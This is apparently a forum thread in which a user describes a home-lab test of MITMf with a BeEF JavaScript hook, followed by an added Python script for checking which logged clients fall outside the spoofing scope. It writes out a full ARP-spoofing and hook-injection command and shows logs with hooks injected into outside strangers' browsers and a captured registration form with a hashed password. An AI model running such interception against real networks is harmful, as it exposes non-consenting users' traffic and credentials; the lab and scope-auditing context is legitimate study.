Thread: Threat when running MITMf with JS hook injection?

    Threat when running MITMf with JS hook injection?

    Hello,

    I am running Kali 2.0 on a VM and I made a small lab in my LAN with a laptop running Windows 7 x64, a MacBook Pro running OS X 10.10, and an iPad and an iPhone both running iOS 9.2.
    My LAN subnet is 192.168.178.0/24

    I want to see the behavior of the browsers on the OSes in my lab, so I injected a JS hook with MITMf and I use BeEF to explore the possibilities of each one.

    Code:
    (MITMf)root@kali-2:~/MITMf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.178.1 --target 192.168.178.27-30 --inject --js-url http://192.168.178.23:3000/hook.js
    I am targeting the range 192.168.178.27-30 which corresponds to the devices in my lab, and 192.168.178.23 is Kali.
    When I browse the Internet with my devices, I can see my browsers in BeEF when they are hooked.

    I checked MITMf logs and here is my question.
    I can see all the logs about the targeted devices (here my iPad):

    Code:
    2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] conn.skype.com
    2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] [Inject] Injected JS script: conn.skype.com
    2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] translate.google.fr
    2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] [Inject] Injected JS script: translate.google.com
    2015-12-21 02:16:04 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] www.googleadservices.com
    2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
    2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com
    2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
    2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com

    But after a while I start seeing logs about other machines out of my LAN:

    Code:
    2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:52 115.239.228.3 [type:Iron-21 os:Windows 8] zc.qq.com
    2015-12-21 02:32:28 115.239.228.3 [type:Iron-21 os:Windows 8] POST Data (zc.qq.com):
    verifycode=EEQA&country=1&province=63&city=9&isnongli=0&year=1991&month=12&day=2&isrunyue=0&password=a1b2279b359890bb0c8baeabf3ad71a29186f3b3cde5e9e861968b2674952cd43fbcd28f4f403bb6558fbae152b446a44dbf16af423e063d6d21af747865abe54021b2c2c612b0e0d3d97fb259a99717d95914d4877f9e4345775ae69d79ca5d6ddc13f6a643ec058542eeb84ec12b9f9c91d20c2f61ded8eafad517e0f0dacf&nick=%E5%B0%B3&email=false&other_email=false&elevel=1&***=1&qzdate=&jumpfrom=58030&telphone=&csloginstatus=1&d9c2=i6g0
    2015-12-21 02:32:37 115.239.228.3 [type:Iron-21 os:Windows 8] a.zc.qq.com
    The IPs 115.239.228.x seem to belong to a Chinese organization, and I have never been on the website "zc.qq.com".
    Does it mean this machine is attacking me?
    How can I avoid this?

    Thank you for your answers

    Manu
    Last edited by manusky; 2015-12-21 at 13:05.
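The question above is about which of the logged clients are actually in scope of the ARP spoof. The following script is an added example, not code from the post or from MITMf: it parses log lines in the format shown in the post, expands the `--target 192.168.178.27-30` range (the expansion of single IPs, a last-octet range and comma-separated lists is my own reading of the MITMf syntax, not its parser), and reports which client addresses fall outside the target range or the 192.168.178.0/24 LAN, which of those still received an injected hook, and which sent POST bodies through the proxy. The sample lines are taken from the post; the POST body line is a shortened, constructed stand-in for the real one.

```python
"""Scope audit for MITMf log lines (added example, not part of the post or of MITMf)."""
import ipaddress
import re

# Values taken from the mitmf.py command line in the post.
LAN_SUBNET = ipaddress.ip_network("192.168.178.0/24")
TARGET_RANGE = "192.168.178.27-30"   # assumed MITMf --target syntax: last-octet range

# Log line format as it appears in the post:
# "<date> <time> <client ip> [type:<browser> os:<os>] <message>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"\[type:(?P<ua>[^\]]*?) os:(?P<os>[^\]]*)\] "
    r"(?P<msg>.*)$"
)

# Sample lines copied from the post; the POST body line is a constructed stand-in.
SAMPLE_LOG = [
    "2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] translate.google.fr",
    "2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] [Inject] Injected JS script: translate.google.com",
    "2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com",
    "2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com",
    "2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com",
    "2015-12-21 02:32:28 115.239.228.3 [type:Iron-21 os:Windows 8] POST Data (zc.qq.com):",
    "verifycode=EEQA&country=1&password=REDACTED&nick=%E5%B0%B3",   # constructed body line
]


def expand_target(spec):
    """Expand a --target spec (assumed syntax: '1.2.3.4', '1.2.3.4-9', '1.2.3.0/28',
    comma-separated) into a set of IPv4Address objects."""
    hosts = set()
    for item in spec.split(","):
        item = item.strip()
        if "-" in item:                      # last-octet range a.b.c.X-Y
            prefix, rng = item.rsplit(".", 1)
            lo, hi = (int(x) for x in rng.split("-"))
            hosts.update(ipaddress.ip_address(f"{prefix}.{n}") for n in range(lo, hi + 1))
        elif "/" in item:                    # CIDR block
            hosts.update(ipaddress.ip_network(item, strict=False).hosts())
        else:
            hosts.add(ipaddress.ip_address(item))
    return hosts


def parse_line(line):
    """Return a dict for a log line in the post's format, or None for anything
    else (for example the raw POST body that follows a 'POST Data (...)' line)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ip"] = ipaddress.ip_address(rec["ip"])
    return rec


def classify(ip, targets, lan=LAN_SUBNET):
    """Place a client address relative to the spoof scope."""
    ip = ipaddress.ip_address(ip)
    if ip in targets:
        return "target"            # one of the ARP-poisoned lab devices
    if ip in lan:
        return "lan-untargeted"    # same subnet, but not in --target
    if ip.is_private:
        return "private-other"     # RFC 1918, but not this LAN
    return "external"              # public address: cannot be a spoofed lab device


def audit(lines, target_spec=TARGET_RANGE, lan=LAN_SUBNET):
    """Summarise which client addresses are out of scope, which of those were
    served an injected hook, and which sent POST bodies through the proxy."""
    targets = expand_target(target_spec)
    scope_by_ip, post_data_ips, injected_external = {}, set(), set()
    for raw in lines:
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        ip = str(rec["ip"])
        scope = classify(ip, targets, lan)
        scope_by_ip.setdefault(ip, scope)
        if rec["msg"].startswith("POST Data"):
            post_data_ips.add(ip)
        if scope == "external" and "[Inject]" in rec["msg"]:
            injected_external.add(ip)
    return {"scope_by_ip": scope_by_ip,
            "post_data_ips": post_data_ips,
            "injected_external": injected_external}


if __name__ == "__main__":
    report = audit(SAMPLE_LOG)
    for ip, scope in sorted(report["scope_by_ip"].items()):
        print(f"{ip:16} {scope}")
    print("hook injected into external clients:", sorted(report["injected_external"]))
    print("POST bodies captured from:", sorted(report["post_data_ips"]))
```

Run against the real log file (`audit(open("mitmf.log"))`), the summary separates the lab devices from everything else: an address outside 192.168.178.0/24 cannot be one of the ARP-spoofed targets, so any `[Inject]` or `POST Data` entry for it is traffic the lab setup was not meant to touch, and the captured form data of such a client is something to delete rather than keep.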
